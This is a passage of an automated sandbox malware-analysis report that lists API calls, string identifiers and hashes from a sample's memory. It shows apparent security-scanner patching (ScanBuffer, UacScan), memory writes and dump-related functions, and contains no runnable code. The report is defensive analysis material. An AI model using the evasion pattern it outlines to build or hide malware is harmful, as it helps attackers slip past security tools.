                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: Library$Thread$AddressContextFreeLoadProc$HandleMemoryModuleResumeVirtualWrite
                • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                • API String ID: 4175202198-51457883
                • Opcode ID: df3ff72c8e11a0e9d88df2487c249c313e9a919c563ee4fff9bfc3cd9c72d782
                • Instruction ID: 9202efb12ccdd574ff916fafa7bb554662b5f7b19ac5e771df053f339d83fcf0
                • Opcode Fuzzy Hash: df3ff72c8e11a0e9d88df2487c249c313e9a919c563ee4fff9bfc3cd9c72d782
                • Instruction Fuzzy Hash: 0FE23E3CA501189FDB25EB68CC95BEE73BAAF84310F1081A1E045EB255DE74EE858F52
                APIs
                  • Part of subcall function 0287881C: LoadLibraryA.KERNEL32(00000000,00000000,02878903), ref: 02878850
                  • Part of subcall function 0287881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02878903), ref: 02878860
                  • Part of subcall function 0287881C: GetProcAddress.KERNEL32(743E0000,00000000), ref: 02878879
                  • Part of subcall function 0287881C: FreeLibrary.KERNEL32(743E0000,00000000,028C2388,Function_000065D8,00000004,028C2398,028C2388,000186A3,00000040,028C239C,743E0000,00000000,00000000,00000000,00000000,02878903), ref: 028788E3
                • GetThreadContext.KERNEL32(00000000,028C2420,ScanString,028C23A4,0287A774,UacInitialize,028C23A4,0287A774,ScanBuffer,028C23A4,0287A774,ScanBuffer,028C23A4,0287A774,UacInitialize,028C23A4), ref: 0287943A
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: Library$AddressContextFreeHandleLoadModuleProcThread
                • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                • API String ID: 1116111917-51457883
                • Opcode ID: 8529730dfcc31987035347ab1229c8fc36d75c5b097fd47be76f4c0024b66ae1
                • Instruction ID: 2d6f3ad2a060dad20144b0be3493d438c817f76b49d59adeead535d842c80e94
                • Opcode Fuzzy Hash: 8529730dfcc31987035347ab1229c8fc36d75c5b097fd47be76f4c0024b66ae1
                • Instruction Fuzzy Hash: 63E23D3CA501189FDB25EB68CC95BEE73BAAF84310F1081A1E045EB355DE74EE858F52
                APIs
                • GetModuleHandleA.KERNEL32(kernel32.dll,02866BC8,02860000,0288E790), ref: 028658D1
                • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 028658E8
                • lstrcpynA.KERNEL32(?,?,?), ref: 02865918
                • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02866BC8,02860000,0288E790), ref: 0286597C
                • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02866BC8,02860000,0288E790), ref: 028659B2
                • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02866BC8,02860000,0288E790), ref: 028659C5
                • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02866BC8,02860000,0288E790), ref: 028659D7
                • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02866BC8,02860000,0288E790), ref: 028659E3
                • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02866BC8,02860000), ref: 02865A17
                • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02866BC8), ref: 02865A23
                • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02865A45
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                • String ID: GetLongPathNameA$\$kernel32.dll
                • API String ID: 3245196872-1565342463
                • Opcode ID: a74d9b6d3cb35030f66892aa297ecaaf577aeea3d9cb74ebdeb3b1dac0b1f381
                • Instruction ID: 3a5c0803a20f3b0a78a4f5d03dc92d3672ba39427bedf774a765dec316ad0210
                • Opcode Fuzzy Hash: a74d9b6d3cb35030f66892aa297ecaaf577aeea3d9cb74ebdeb3b1dac0b1f381
                • Instruction Fuzzy Hash: 75416E7DD00259AFDB10DAE8CC8CAEEB3BEAF08301F4445A5A148E7341D7349B548F50
                APIs
                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02865B94
                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02865BA1
                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02865BA7
                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02865BD2
                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02865C19
                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02865C29
                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02865C51
                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02865C61
                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02865C87
                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02865C97
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                • API String ID: 1599918012-2375825460
                • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                • Instruction ID: 9351c92333038c36fb9c1b53cdbc90f0532b7047c0aa3a72c670d830508f0fde
                • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                • Instruction Fuzzy Hash: C131757DE4021D6AFB25D6B89C4EBFFB7AD5B04380F4401E19648E6281DB789A448F51
                APIs
                • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,028C23A4,0287A3BF,ScanString,028C23A4,0287A774,ScanBuffer,028C23A4,0287A774,Initialize,028C23A4,0287A774,UacScan), ref: 028787AC
                • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028787C6
                • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,028C23A4,0287A3BF,ScanString,028C23A4,0287A774,ScanBuffer,028C23A4,0287A774,Initialize), ref: 02878802
                  • Part of subcall function 02877CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02877D6C
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                • String ID: BCryptVerifySignature$bcrypt
                • API String ID: 1002360270-4067648912
                • Opcode ID: b5f40348a896ca05b799b1cae3ad17d9980ce2c704cdc2bf7631640031255953
                • Instruction ID: 072bd2826333d915bcc36f38244bd29967f3a6f47c1d2304e08862f68c93ed13
                • Opcode Fuzzy Hash: b5f40348a896ca05b799b1cae3ad17d9980ce2c704cdc2bf7631640031255953
                • Instruction Fuzzy Hash: FBF0C87DA803245EE310BA7DA849F26379CB786314F28092EBD08C71E4DBB984108B50
                APIs
                  • Part of subcall function 02864ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02864EDA
                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0287DFD2), ref: 0287DF3F
                • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0287DF79
                • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0287DFA6
                • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0287DFAF
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                • String ID:
                • API String ID: 3764614163-0
                • Opcode ID: 63f284f1fccb4ed2b20c6f9981f55e5a8b6b99eb1eb23c8acbd37150283a865b
                • Instruction ID: 33b4e24841ffea2dfca741c3a4b5bca350db03b643fb46d6915a52aad0e93e7d
                • Opcode Fuzzy Hash: 63f284f1fccb4ed2b20c6f9981f55e5a8b6b99eb1eb23c8acbd37150283a865b
                • Instruction Fuzzy Hash: 8221C179A40309BAEB21EAE4CD46FAEB7BDDF04B10F504561B600F75D0D7B4AE048B56
                APIs
                • RtlInitUnicodeString.NTDLL(?,?), ref: 0287DEA0
                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0287DEF2), ref: 0287DEB6
                • NtDeleteFile.NTDLL(?), ref: 0287DED5
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: Path$DeleteFileInitNameName_StringUnicode
                • String ID:
                • API String ID: 1459852867-0
                • Opcode ID: 325337a237ec81c7330dabc088c3f02ae3ce2803b25c134d4e13a4cdb927654d
                • Instruction ID: 2a0cd64523128d557ee4d5abac0aaa9aeaff4190bde222a95bf6ab57d56dfc71
                • Opcode Fuzzy Hash: 325337a237ec81c7330dabc088c3f02ae3ce2803b25c134d4e13a4cdb927654d
                • Instruction Fuzzy Hash: 1801677F9443486EEB06E7A48D81BDD77BDAF64704F5000D2E200F6191DB74EB048B22
                APIs
                  • Part of subcall function 02864ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02864EDA
                • RtlInitUnicodeString.NTDLL(?,?), ref: 0287DEA0
                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0287DEF2), ref: 0287DEB6
                • NtDeleteFile.NTDLL(?), ref: 0287DED5
                  • Part of subcall function 02864C0C: SysFreeString.OLEAUT32(0287ED84), ref: 02864C1A
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                • String ID:
                • API String ID: 1694942484-0
                • Opcode ID: e78fee3db8c156953e6118557ccb4842c683d42a43bceae3164544563e8b925a
                • Instruction ID: 9b5b9c735fac8157cdd4524cfc859c5f2f3acbb1766d5e7b427223e675fdbbc7
                • Opcode Fuzzy Hash: e78fee3db8c156953e6118557ccb4842c683d42a43bceae3164544563e8b925a
                • Instruction Fuzzy Hash: 1201F47EA40208BAEB11EBE4CD41FDEB3BDDF58700F5044B1E605F2580EB74AB048A65
                APIs
                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02867F75
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: DiskFreeSpace
                • String ID:
                • API String ID: 1705453755-0
                • Opcode ID: 0fbec54a0c02fd547ee90df4e96e63df58f4455ae2e88ae87e717fe42b60fd3b
                • Instruction ID: e05d4d7ba06d01dcbf0547fa2e3d46c71733ffbb1c45f09259bc8b7cc85c1231
                • Opcode Fuzzy Hash: 0fbec54a0c02fd547ee90df4e96e63df58f4455ae2e88ae87e717fe42b60fd3b
                • Instruction Fuzzy Hash: E21100B5A00209AF9B04CF99C981DBFF7F9EFC8704B14C569A508EB254E6319A018B90
                APIs
                • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0286A762
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID:
                • API String ID: 2299586839-0
                • Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                • Instruction ID: 71c648867dab5cf1d4c948ab86cd5aef37f15997a8ae272273482616e821a1fe
                • Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                • Instruction Fuzzy Hash: 64E0D83D70021827D325A56C9C8C9FAB35D975C710F00417EBD49D7341FEA09E404EE9
                APIs
                • GetVersionExA.KERNEL32(?,0288D106,00000000,0288D11E), ref: 0286B71A
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: Version
                • String ID:
                • API String ID: 1889659487-0
                • Opcode ID: b81d80259d0433e05af67089162d111909e9ff3dc812430747256be187992e26
                • Instruction ID: ed6f9c994835273618b8f5690189a0e55a12bcb249a9ba1b9ac118449a9b06c9
                • Opcode Fuzzy Hash: b81d80259d0433e05af67089162d111909e9ff3dc812430747256be187992e26
                • Instruction Fuzzy Hash: AEF0A47C9443019FD350EF28D944A2577E9FB49718F008D29F699C7380E73894148F52
                APIs
                • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0286BDF2,00000000,0286C00B,?,?,00000000,00000000), ref: 0286A7A3
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID:
                • API String ID: 2299586839-0
                • Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                • Instruction ID: e645eebc350de4c7301ec90b5dcb5d208bdc21c0e933716ef401ac9d029c954e
                • Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                • Instruction Fuzzy Hash: D2D05EAE30E2A03AA224955E2D88D7B9AFDCAC57A1F00407EF588C6201D2048C0596F1
                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: LocalTime
                • String ID:
                • API String ID: 481472006-0
                • Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                • Instruction ID: 3dbe188fe611524e1530fe5977efe1203383bd43af5cd73025fa91cdffa94236
                • Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                • Instruction Fuzzy Hash: DBA01108808830028A803B2C0C0223AB088A800A20FC80F80A8F8802E2FE2E023080E3
                Memory Dump Source
                • Source File: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: db0987c11834ef1ad2f30c2134f0e553cd95669274d141d47152249faadffea2
                • Instruction ID: 082c42a29207ccb37e8553ce1260946e503d467e6c4ecfaadf81fe4b6b6cc0c0
                • Opcode Fuzzy Hash: db0987c11834ef1ad2f30c2134f0e553cd95669274d141d47152249faadffea2
                • Instruction Fuzzy Hash: 6D51481A41E3C28FCB439F7888A4292BFB19D9756434E05DBD8D4CF1A3D20A589FD762
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                APIs
                • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0286D21D
                  • Part of subcall function 0286D1E8: GetProcAddress.KERNEL32(00000000), ref: 0286D201
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                • API String ID: 1646373207-1918263038
                • Opcode ID: 43d05d4ba6d0f3ca944089eced2a1a90d787c7e21042096384a7481677794031
                • Instruction ID: 2ef0aec8611adb57eb7c281ca2bc74e9a19f183a5f25a68693299783bfb81ba7
                • Opcode Fuzzy Hash: 43d05d4ba6d0f3ca944089eced2a1a90d787c7e21042096384a7481677794031
                • Instruction Fuzzy Hash: 1341A16DB852085B56086B6E740C437FFDED7887143B0841BFA44CBB88DEF0BD594A6A
                APIs
                • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02876E5E
                • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02876E6F
                • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02876E7F
                • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02876E8F
                • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02876E9F
                • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02876EAF
                • GetProcAddress.KERNEL32 ref: 02876EBF
                Strings
                Memory Dump Source
